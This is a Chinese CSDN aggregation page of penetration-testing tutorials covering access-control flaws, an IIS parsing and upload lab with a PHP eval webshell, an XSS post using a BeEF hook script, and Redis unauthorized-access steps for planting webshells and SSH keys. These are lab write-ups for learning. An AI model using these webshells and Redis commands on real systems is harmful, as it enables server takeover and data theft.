精华内容
下载资源
问答
  • 权限漏洞:水平权限漏洞、垂直权限漏洞

    万次阅读 多人点赞 2019-07-31 19:21:31
    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。 漏洞示例: XXX/...

    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。

    漏洞示例:

    XXX/getAddress?id=1

    如上,攻击者修改addressId即可得到他人的address信息。开发容易习惯性的在生成CRUD(增查改删)表单(或AJAX请求)的时候根据认证过的用户身份来找出其有权限的被操作对象的id来提供入口,然后让用户提交请求,并根据这个id来操作相关对象。在处理CRUD请求时,都天真地默认只有有权限的用户才知道这个入口,进而才能操作相关对象,因此就不再校验权限了。可悲剧的是大多数对象的ID都被设置为自增整型,所以攻击者只要对相关id加1、减1、直至遍历,就可以操作其他用户所关联的对象了。

    修复方案:

    1、最正规的方案:把权限的控制转移到数据接口层中,避免出现select/update/delete ... where addressID=#addressID#的SQL语句,使用select/update/delete... where addressID=#addressID# and ownerId=#userId#来代替,要求web层在调用数据接口层的接口时额外提供userid,而这个userid在web层看来通常只能通过seesion来取到,以防用户造假。但这个方案的缺陷在于实现起来要改动底层的设计,所以不适合作为修复方案,更适合作为在最开始设计时的统一控制方案。

    2、最直接有效的修复方案:在web层的逻辑中做鉴权,检查提交CRUD请求的操作者(通过session或token等加密信息中得到,以防造假)与目标对象的权限所有者是否一致,如果不一致则阻断。这个方案实现成本低、能确保漏洞的修复质量,缺点是增加了一次查库操作。我之前一直用这种方案来对已发生的水平权限漏洞做紧急修复。

    另外的方法:

    1、可对ID加密

    2、使用UUID

    3、每一个信息增加一个发布人的字段,修改的人必须与发布的人为同一个人才可以访问

     

    垂直权限漏洞是指Web应用没有做权限控制,或仅仅在菜单上做了权限控制,导致恶意用户只要猜到了其他页面的URL,就可以访问或控制其他角色拥有的数据或页面,达到权限提升的目的。

    修复方案:

    只需要对url资源进行权限验证即可。

    展开全文
  • ctf-web:文件上传漏洞和文件解析漏洞

    万次阅读 2020-10-11 21:13:56
    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,...

    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍.
    其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么…
    当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了.
    先说说这两个漏洞的区别.
    一.文件上传漏洞
    这个漏洞产生的原因是因为上传文件的不严谨所产生的.
    比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将上传的文件存放在服务器,这样是十分危险的.并且一般和后面的文件解析漏洞配合在一起使用.
    二.文件解析漏洞
    这个漏洞是由于服务器的原因造成的,就比如我们一会儿要举例的iis6.0服务器就有这个漏洞.
    简单来说,在iis6.0服务器上,如果服务器有一个"xxx.asp"文件夹,那么就会将这个文件下面的所有文件都当成一个asp脚本去执行.

    想想看,如果我们上传了一个删除系统数据库的病毒文件上去,然后又被解析成了某种语法去执行,是不是后果很可怕?
    因此,我会特地去讲一下这个东西的如何去实现的.后面我会把网站的源码附上.很多服务器都存在这个漏洞,我这里就介绍iis6.0的文件解析漏洞,想看其他的服务器的漏洞可以去百度一下.
    工具的话我把名字发上来,自己去找一下.
    实验环境:虚拟机win2003一台,软件phpstudy,中国菜刀

    一.iis6.0服务器的文件解析漏洞

    前面已经说过,iis6.0的漏洞就是会把xxx.asp文件夹下的文件都当作asp文件执行,我们试试便知.
    win2003都会自带iis6,因此直接安装就好,安装教程我就不发了,百度有.
    如图,此刻已经是安装好的.记得点到web的选项,按照图中进行配置.
    在这里插入图片描述
    此刻我们已经搭建网站成功.用主机输入服务器ip即可进行访问.由于我之前搭建phpstudy占用了80端口,我就把端口改成了82.你们在做的时候应该是不需要这一步的.
    在这里插入图片描述
    配置好以后,点击网站,然后右键那个默认网站,点击停用.
    在这里插入图片描述
    之后右键网站->新建->网站,新建一个自己的网站.我的已经建好了,就不做多余的演示了
    在这里插入图片描述

    需要注意的是,在新建网站的时候,有个运行脚本的选项要选上.如图
    在这里插入图片描述

    在这个里面点击右键,添加一个文件,和文件夹,文件名字叫做"index.html",文件夹名字随便起一个以.asp结尾的即可,我的是wzc.asp.然后在文件夹里面新建一个文件,名字随便起一个,比如1.txt.
    在这里插入图片描述
    在这里插入图片描述
    然后在这两个新建的1.txt和index.html都写入以下的内容:

    <%
    response.write("My first ASP script!")
    %>
    

    为什么要这么建文件呢?其实就是为了验证这个漏洞的.上面的代码是asp的语法,在屏幕上显示一句话.
    如果文件被解析成了asp文件,那么就会只显示引号里面的内容.
    如果没有的话,就直接把所有内容都显示出来.
    因此.我们新建了这两个文件用来验证.

    验证一:访问非asp文件夹下的文件(我的端口是81)

    也就是网站的主页.我用主机进行访问时,页面显示的是这样的:
    在这里插入图片描述
    看,是不是直接把文件当成了一个txt文本显示了出来?

    验证二:访问以.asp结尾文件夹下的文件

    访问结果如图:
    在这里插入图片描述
    果然,我们的代码被当成了asp脚本执行了.由此验证,我们的iis6.0确实存在这个漏洞.

    二.文件上传漏洞和文件解析漏洞的结合使用

    文件上传漏洞产生的原因就不像上一个是因为服务器产生的了,而是因为程序员的不严谨而产生的.
    在一些允许上传文件的网站中,编写php后台脚本时,不会对文件近进行检查,所以有一些黑客会利用这个上传一个叫"一句话木马"的脚本.
    这种脚本属于木马,当上传成功以后,在攻击者的电脑使用比如"中国菜刀"之类的软件进行连接,最终为所欲为.
    当然,中国菜刀属于比较落后的软甲,比较先进的有冰蝎等软件.有兴趣可以百度.
    由此可见,这种漏洞的危害性是非常大的.下面我会演示一下这个过程.

    过程实现

    首先安装phpstudy,然后在你的服务器下添加下面两个网站.源码发在下面.
    文件一:upload-file.html

    <html>
    <head>
     <title> 文件上传之解析漏洞~php</title>
     </head>
    <body>
    
    <form action="upload.php" method="post"
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file" /> 
    <br />
    <input type="submit" name="submit" value="提交" />
    </form>
    
    </body>
    </html>
    

    文件二:upload.php

    <?php
    
      if ($_FILES["file"]["error"] > 0)
        {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        }
      else
        {
        echo "Upload: " . $_FILES["file"]["name"] . "<br />";
        echo "Type: " . $_FILES["file"]["type"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    
        if (file_exists("upload/" . $_FILES["file"]["name"]))
          {
          echo $_FILES["file"]["name"] . " already exists. ";
          }
        else
          {
          move_uploaded_file($_FILES["file"]["tmp_name"],
          "upload/" . $_FILES["file"]["name"]);
          echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
          }
        }
     
    ?>
    

    放在如图的位置.
    在这里插入图片描述
    远程访问以下,发现成功.
    在这里插入图片描述
    我们随便上传一个php文件.
    在这里插入图片描述
    …连点防御都没有(从那个php代码就可以看出,不过我是从攻击者的角度出发的,由此可证明这个php代码有文件上传的漏洞).
    如图,在服务器下有个upload文件,里面就是我们上传的文件.
    在这里插入图片描述
    这个php一句话木马只是用来测试的,是为了看看能不能上传成功.现在我把一句话木马源码奉上.

    <?php eval($_POST["wzc"]);?>
    

    这段代码的原理我就不解释了.目的是为了方便使中国菜刀进行连接.你需要修改的使引号里面的内容,这个是后面中国菜刀连接是的密码.
    如图,这个是我的中国菜刀的界面,按照图中的方式配置.
    在这里插入图片描述
    上面把你的一句话木马的网站上的路径填上.我当时为了方便,把名字改成了"1.php".后面的空填刚刚的密码,下面记得选择php(eval)代码类型.连接以后,右键文件管理,会产生如图的效果.
    在这里插入图片描述
    看,现在我们就进到服务器里面了,接下来想怎么搞就怎么搞了.

    好了,就写这么多吧.
    剩余的也懒的想了,如果还想继续看一些东西的话,可以关注我,我后续会发一些比如数据库注入,软件破解之类的东西.
    有兴趣的可以加我qq:1392969921

    展开全文
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ 阿里云漏洞响应平台:https://security.alibaba.com/ i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应...

    //由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。

    1.1 漏洞平台

    补天漏洞响应平台:https://www.butian.net/

    漏洞银行:https://www.bugbank.cn/

    阿里云漏洞响应平台:https://security.alibaba.com/

    i春秋SRC部落:https://www.ichunqiu.com/src

    腾讯应急响应中心:https://security.tencent.com/index.php

    网易、百度等等。

     

    1.2 网站情况

    常见漏洞类型:

    XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

     

    发现漏洞方法:

    1. 手工寻找(XSS,SQL注入,CSRF等等)。

    难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

    一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

     

    2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

    难度系数:⭐⭐  牛逼指数:⭐⭐⭐

    在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

     

    3. 手工寻找+工具扫描/辅助

    难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

    通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

     

    防护情况案例一:(可能会涉及到什么所以对厂商均打码)

    厂商:

     

    子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

     

    防护情况案例二:

    厂商

     

    找到asp脚本编写同时有id传参的页面

     

    尝试注入语句

    /video_list.aspx?s_classid=221 and 1=2

    回车

     

    防火墙拦截。

    防护情况案例三:

    厂商:大部分厂商

    即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

     

    1.3 发现/提交漏洞

    厂商

    网址:

     

    发现步骤

    1. 手工寻找

    网页的大部分新闻内容全为静态的内容,无下手之地。

     

    直到

     

    进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

     

    注册:

     

    在手工找不到可能存在的漏洞点,尝试工具扫描

    //2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。

    //以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!

    //手工测试可对url进行burp的xss语句检测即可。

     

    使用工具(AWVS)进行站点扫描

    幸运的是,该站点对扫描没有进行设置防御,

    扫到该站点的目录

    其中Forbidden是权限不够无法访问,但是文件存在。

     

    接下来,很明显的看到了极有可能是后台admin目录

    不幸的是,能访问,文件也存在,无回显内容

     

    一片空白,继续换下一个思路

    查看是否存在漏洞。

    其中显目的第一个 Cross Site Scripting (XSS)

    寻找到这三个漏洞点

     

     

    进入直接弹出对话框

    接下来看是什么地方存在漏洞点:

     

    渗透测试XSS语句

    '%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

    经过简化

    %22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

     

    效果等同于:"><ScRiPt >alert(123)</ScRiPt>

     

    这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

    其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

     

    这也能说明当右键编辑http请求的时候会弹出对话框。

     

    知道漏洞点漏洞原理后,找到漏洞点:

     

    /index.php/core/uploader-image_cut?module=item&system=ask&url=e

     

     

    其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

    利用测试语句测试漏洞的存在

     

    漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

     

    接下来利用XSS漏洞

     

    利用工具:beef (kali下的xss平台)

     

    利用步骤:

     

    1. beef工具平台开启

     

     

    Kali ip:192.168.88.149

     

    2. 制造XSS利用链接:

    ’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

     

     

    3. 访问者访问

    Win10

    回车后,直观上网页无反应

     

    4. 查看beef平台

     

    可以看到ip,操作系统,系统软件的配置

    重要的在下面

     

    拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

     

    到此结束,没有进一步的渗透(还不会高级的)。

     

    下面为漏洞提交的页面

     

     

     

    1.4 思路总结

    1. 学会工具和手工结合,会有意外收获。

    2. 常规注入点,漏洞点别放过。

    3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

    4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

    5. 最后提出解决方案,完事。

    不做破坏!授权测试!

    展开全文
  • redis未授权访问漏洞完整复现与踩坑

    万次阅读 2020-10-13 15:48:04
    CATALOG前言环境配置靶机环境配置第一步:下载并解压redis第二步:修改配置文件第三步:开启redis在攻击机上下载redisredis常见命令漏洞利用须知与漏洞理解实验过程前言资产列表漏洞利用:利用漏洞写入webshell漏洞...

    前言

    几年前就知道这个漏洞,可是一直没有机会复现,这两天真好有机会复现一下它,在这里做一个记录。

    环境配置

    靶机环境配置

    第一步:下载并解压redis

    1. 下载redis并安装

    wget http://download.redis.io/releases/redis-3.2.9.tar.gz
    tar xzf redis-3.2.9.tar.gz
    cd redis-3.2.9
    make

    倘若配置出问题,可以在redis-3.2.9文件夹下执行make test根据回显进行debug。make test命令出现下图所示,即代表安装所需所有环境都正确:
    在这里插入图片描述

    安装的时候遇见了linux安装redis时遇到的fatal error: stdlib.h: No such file or directory问题,可以点击链接进去看看解决方案。

    如果遇见卸载gcc后无法再次安装,执行apt autoremove,接着执行apt-get install gcc即可。
    https://blog.csdn.net/weixin_46612410/article/details/107514523

    遇见cc: error: …/deps/geohash-int/geohash.o: No such file,进入源码包目录下的deps目录中执行
    make geohash-int hiredis jemalloc linenoise lua
    https://www.cnblogs.com/hujiapeng/p/7825883.html

    1. 安装openssh-server、apache2

    sudo apt-get install openssh-server apache2 -y

    第二步:修改配置文件

    配置文件在下图的位置:在这里插入图片描述

    在bind前面加上 #
    在这里插入图片描述
    将protected-mode改为no,3.2以上版本,默认开启了protected模式
    在这里插入图片描述

    第三步:开启redis

    重启服务然后进入redis-3.2.9目录下的src目录并打开redis-server

    systemctl restart redis-server.service #重启服务
    cd src
    ./redis-server redis.conf_path #切记第二个常熟市redis.conf的路径,一般在redis-3.2.9目录下
    在这里插入图片描述

    开启后可以在靶机上使用redis-cli命令测试看是否成功,如果出现下图的数据即成功,下图中的数据要进入redis后执行info命令才可以,注意箭头所指的字段值
    在这里插入图片描述

    在攻击机上下载redis

    步骤同上,不需要修改配置文件。或者直接执行sudo apt install redis-server -y下载redis即可,如果是mac直接执行brew install redis即可,mac上redis的配置文件在/usr/local/Cellar/redis/6.0.8/.bottle/etc
    在这里插入图片描述

    redis常见命令

    1. 远程连接redis:
      redis-cli -h 192.168.122.203
    2. 查看redis版本信息、一些具体信息、服务器版本信息等等:
      192.168.122.203:6379> info
    3. 获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。
      192.168.122.203:6379> CONFIG GET dir
      192.168.122.203:6379> CONFIG GET dbfilename
    4. 将变量x的值设为test、获取变量x的值:
      192.168.122.203:6379> set x “test”
      192.168.122.203:6379> get x

    漏洞利用须知与漏洞理解

    1. 利用redis来写出来的文件一定会有一部分乱码,解决方式为在数据的前后加上至少三个\n,如果不这样子,则会导致shell执行失败,实际奥做如下如下:
      在这里插入图片描述
      这样子实际生成的文件为:
      在这里插入图片描述
    2. 这个漏洞利用可以这样理解:
    • 如果有了redis未授权访问权限,我们就有了在对方电脑上写文件的权利。
    • 使用config set dir [path]命令来决定文件的写入路径。
    • 使用config set dbfilename [filename]来决定文件名。
    • 使用set key value,来确定文件的内容,key值任意即可,value即为文件内容。
    • 使用save命令来确定以上所有操作并生成文件。
    1. 我们可以在写文件之前先用config get dir与config get dbfilename命令查询这两个字段的值并保存起来,等到我们写完文件后恢复这两个字段的值,增加我们攻击的隐蔽性。
    2. 必须在非保护模式下才有可能利用这个漏洞,如果在保护模式下即使访问了redis也是无法执行命令的,如下图所示。
      在这里插入图片描述

    实验过程

    前言

    利用这个漏洞我们一般会去实现写入webshell、写入ssh公钥、在crontab里写定时任务,反弹shell这三种,我们依次来实现。

    资产列表

    主机名 ip
    攻击机 10.92.78.137
    靶机 192.168.124.138

    因为是redis未授权,所以任意可以访问到靶机的主机都可以访问6379端口来控制其redis服务。
    在这里插入图片描述

    漏洞利用:利用漏洞写入webshell

    1. 连接上redis后输入以下命令:
    192.168.124.138:6379> config set dir /var/www/html/
    OK
    192.168.124.138:6379> config set dbfilename muma.php
    OK
    192.168.124.138:6379> set x "\n\n\n<?php @eval($_POST['cc']);?>\n\n\n"
    OK
    192.168.124.138:6379> save
    OK
    
    
    1. 然后打开蚁剑连接这个webshell
      在这里插入图片描述

    漏洞利用:写入ssh公钥

    写入ssh公钥后可以在本机存储对应的ssh密钥,然后直接无密码登陆。

    1. 利用ssh-keygen -t rsa生成公钥密钥文件
      在这里插入图片描述

    2. 修改公钥文件的内容,在其最前面与最后面加上三个反斜杠n,命令如下:

    (echo -e "\n\n\n"; cat /Users/shukasakai/.ssh/id_rsa.pub; echo -e "\n\n\n") > ~/Desktop/test.txt
    

    最终生成文件如下:在这里插入图片描述

    1. 将公钥写入靶机:
    shukasakai@zhujiayu Desktop % cat /Users/shukasakai/Desktop/test.txt | redis-cli -h 192.168.124.138 -x set x
    shukasakai@zhujiayu Desktop % redis-cli -h 192.168.124.138
    192.168.124.138:6379> config set dir /root/.ssh
    OK
    192.168.124.138:6379> config set dbfilename authorized_keys
    OK
    192.168.124.138:6379> get x
    "\n\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjb3a/Bm/KJyZ0KXiyOpYNz8FOm6mfe0iiATbH/41CvwgXe5nXIM0CEvF+1chwi3RKNsZcNXx59IaWOSKF9W1gX+BtdejJRD15TxxgVKgNcqHH66xDt8U/rWuTgOiPf7UgLNFx57HqMfBgT54drnD4UdrInOUGtg3oPyoPgDkD7LU90zWj+bJkqciqkA6OZiHJrzpEO+cTRLlugkVyI3N4v3zLY03v+38A7k/jhCuHpZctSVGdzM/QAHorImQo6T/EXTFwQkGcjSipVWP+jxcUsKIzPv+YCeW86h55zWmpbeQInj8jhGY1dBD3OXnlxpk/onQpvU5u0m/PlVbROFEC3YDlmZ1mgTrasPK7rRk7RAP6k+RSqGvXvFQSgV3kt0B9UXwz4iOlzaWSm+0WbiaznuBESKACI8NxpV+hwf2rzSvd7sAIJDoi8LGMYfSQ0Ocup6pIgP4Y73xLKxnVwqOiDwWpZQ6VsOYVOuxgpp3zvLBqQBWqDHxGhnG0EGcLBak= shukasakai@zhujiayu\n\n\n\n\n"
    192.168.124.138:6379> save
    OK
    192.168.124.138:6379> 
    
    1. 直接无密码登陆或者用刚设置的passphase字段的值来登陆对方主机,由于我设置的是空密码所以直接登录即可:
      在这里插入图片描述

    漏洞利用:利用计划任务反弹shell

    只能在centos环境中利用因为centos环境中的计划任务文件可以忽略乱码,ubuntu环境因为无法忽略文件中的乱码因此无法使用。

    漏洞修复建议(引用他人博客)

    网上收集的一些修复建议:

    1. 禁止一些高危命令
      修改 redis.conf 文件,添加
      rename-command FLUSHALL “”
      rename-command CONFIG “”
      rename-command EVAL “”
      来禁用远程修改 DB 文件地址

    2. 以低权限运行 Redis 服务
      为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆
      $ groupadd -r redis && useradd -r -g redis redis

    3. 为 Redis 添加密码验证
      修改 redis.conf 文件,添加
      requirepass mypassword

    4. 禁止外网访问 Redis
      修改 redis.conf 文件,添加或修改,使得 Redis 服务只在当前主机可用
      bind 127.0.0.1

    5. 保证 authorized_keys 文件的安全
      为了保证安全,您应该阻止其他用户添加新的公钥。
      将 authorized_keys 的权限设置为对拥有者只读,其他用户没有任何权限:
      $ chmod 400 ~/.ssh/authorized_keys
      为保证 authorized_keys 的权限不会被改掉,您还需要设置该文件的 immutable 位权限:
      # chattr +i ~/.ssh/authorized_keys
      然而,用户还可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况,需要设置 ~./ssh 的 immutable 位权限:
      # chattr +i ~/.ssh
      注意: 如果需要添加新的公钥,需要移除 authorized_keys 的 immutable 位权限。然后,添加好新的公钥之后,按照上述步骤重新加上 immutable 位权限。

    展开全文
  • 软件漏洞分析简述

    万次阅读 2020-02-04 01:36:59
    软件漏洞 1.1漏洞的定义 漏洞,也叫脆弱性(英语:Vulnerability),是指计算机系统安全方面的缺陷,使得系统或其应用数据的保密性、完整性、可用性、访问控制等面临威胁。 漏洞在各时间阶段的名称 根据是否公开分为...
  • 我又回来更新了,这次是关于web方面的文件包含漏洞.我会在后面以详细的角度来写清楚这个漏洞的利用方法. 当然,以下都是我自己的理解,表述什么的都有些野人化了.所以希望各位大佬手下留情. 一.漏洞产生的原因 这个...
  • Netlogon 特权提升漏洞 CVE-2020-1472
  • XSS(跨站脚本)漏洞详解 XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script...
  • 逻辑漏洞之越权访问漏洞

    千次阅读 2019-06-26 18:53:08
    越权漏洞 越权漏洞的挖掘 越权漏洞的修复 越权漏洞 越权漏洞是Web应用程序中一种常见的安全漏洞。该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查(比如说修改...
  • 逻辑漏洞之支付漏洞

    千次阅读 2018-06-01 17:00:02
    支付漏洞乌云案例之顺丰宝业务逻辑漏洞案例说明顺丰宝存在支付逻辑漏洞,可以允许用户1元变1亿元。这个漏洞在其他网站很难存在,原因是页面交互都使用了对字段做签名。但是顺丰宝没做签名,导致支付金额可以被修改为...
  • 十大漏洞之逻辑漏洞

    千次阅读 2020-03-13 08:55:22
    在十大漏洞中,逻辑漏洞被称为“不安全的对象引用,和功能级访问控制缺失”。现如今,越权和逻辑漏洞占用比例比较高,包括任意查询用户信息,重置任意用户密码,验证码爆破等。 逻辑漏洞: 常见的逻辑漏洞: 交易...
  • saltstack漏洞

    千次阅读 2021-01-16 08:04:28
    漏洞具体描述 Salt(又称为SaltStack),一种全新的基础设施管理方式,部署轻松,在几分钟内可运行起来,扩展性好,很容易管理上万台服务器,速度够快,服务器之间秒级通讯。 国外某安全团队披露了SaltStack存在...
  • 漏洞解决方案-明文传输漏洞

    千次阅读 2020-08-11 09:53:50
    漏洞解决方案-明文传输漏洞漏洞解决方案-明文传输漏洞一、漏洞概述二、利用方法和手段三、漏洞防御解决方法 漏洞解决方案-明文传输漏洞 一、漏洞概述 敏感数据明文传输简单点来说就是当我们在网站上面提交敏感数据...
  • 越权漏洞

    千次阅读 2021-03-28 10:17:29
    越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞 越权访问漏洞的产生 比如,某个订单系统,用户可以查询自己的订单信息。A用户查询订单时,发送的HTTP请求中包含参数“orderid=A”,订单...
  • 逻辑漏洞之越权、支付漏洞

    千次阅读 多人点赞 2020-09-06 11:52:38
    目录逻辑漏洞Web安全渗透三大核心方向输入输出登录体系、权限认证业务逻辑漏洞分类1、登录体系安全暴力破解cookie安全加密测试登录验证绕过任意注册2、业务一致性安全手机号篡改邮箱和用户名更改订单ID更改商品编号...
  • 事件型漏洞就是某一个具体的网站或应用的漏洞。例如,某手机官方论坛800多万用户信息泄露、某旅游网站用户信用卡信息泄露均属于该漏洞类型。 通用型漏洞就是某一类的网站或应用的漏洞,比如各种CMS、通用组件等漏洞...
  • 文件解析漏洞

    千次阅读 2018-09-25 08:40:27
    文件解析漏洞 IIS解析漏洞 目录解析漏洞(/test.asp/1.jpg) 文件名解析漏洞(test.asp;.jpg) 畸形解析漏洞(test.jpg/*.php) 其他解析漏洞 Ngnix解析漏洞 畸形解析漏洞(test.jpg/*.php) %00空字节代码解析漏洞 ...
  • 漏洞总结-linux提权漏洞

    千次阅读 2020-09-02 14:03:20
    漏洞总结-linux提权漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以提权成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 ...
  • 漏洞详解

    千次阅读 2019-09-03 11:14:35
    漏洞的定义 官方定义:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的下访问或破坏系统。 基本理解:漏洞是协议在生命周期的各个阶段(设计、实现、运维...
  • UEditor漏洞

    千次阅读 2019-07-29 23:00:06
    UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用...该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
  • Joomla漏洞

    千次阅读 2018-07-09 20:12:14
    开始复现漏洞
  • XSS漏洞

    万次阅读 多人点赞 2019-03-01 18:51:48
    XSS是web安全中最为常见的漏洞,XSS全称是Cross Site Script。XSS攻击通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而控制用户浏览的一种攻击。 这里的跨站访问,可以是从正常的网站跨到黑客的服务器...
  • 逻辑漏洞实验

    千次阅读 2021-03-17 14:49:56
    逻辑漏洞实验 ...
  • WEB安全漏洞之javascript版本漏洞

    万次阅读 2019-05-20 10:14:34
    漏洞说明 在用webinspect或者appscan等工具扫描项目的时候,js版本漏洞(版本过低)是其中比较常见的一个。漏洞说明为:项目使用了存在漏洞的jquery版本,可能会导致跨站脚本攻击(XSS)。 修复该漏洞的方法为更新...
  • XXE漏洞

    千次阅读 2018-08-31 14:05:21
     XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定...
  • OpenSSL相关漏洞

    千次阅读 2019-05-31 14:09:48
    心脏出血漏洞(CVE-2014-0160) OpenSSL CCS注入漏洞(CVE-2014-0224) OpenSSL FREAK Attack漏洞(CVE-2015-0204) TLS/SSL协议RC4算法漏洞(CVE-2013-2566) SSLv3 POODLE攻击信息泄露漏洞(CVE-2014-3566) 关于...
  • 漏洞修复:javascript框架库漏洞

    千次阅读 2019-11-01 14:14:39
    漏洞修复:javascript框架库漏洞重现方案一:升级Servlet3.0需要兼容 Java EE 6.0 的容器,如Tomcat7方案二:利用HttpResponse的addHeader方法,设置Set-Cookie的值 JavaScript 框架或库是一组能轻松生成跨浏览器...
  • Gitlab相关漏洞

    千次阅读 2020-01-15 10:04:05
    Gitlab相关漏洞 Gitlab任意文件读取漏洞(CVE-2016-9086) Gitlab敏感信息泄露漏洞(CVE-2017-0882) Gitlab远程代码执行漏洞(CVE-2018-14364) Gitlab Wiki API 远程代码执行漏洞(CVE-2018-18649) Gitlab GitLab是...
  • Zookeeper漏洞大全

    千次阅读 2020-08-11 08:51:13
    Zookeeper漏洞大全Zookeeper漏洞总结Apache Zookeeper 访问控制错误漏洞Apache Zookeeper 授权问题漏洞Apache Zookeeper 安全漏洞Apache Zookeeper 缓冲区溢出漏洞Apache Zookeeper 信任管理漏洞 Zookeeper漏洞总结 ...
  • 逻辑漏洞之密码找回漏洞(semcms)

    千次阅读 多人点赞 2020-09-06 11:55:15
    目录什么是密码找回漏洞一般流程可能产生该漏洞的情况脑洞图1.用户凭证暴力破解2.返回凭证3.邮箱弱token4.用户凭证有效性5.重新绑定6.服务器验证7.用户身份验证8.找回步骤9.本地验证10.注入11.Token生成12.注册覆盖...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 137,944
精华内容 55,177
关键字:

漏洞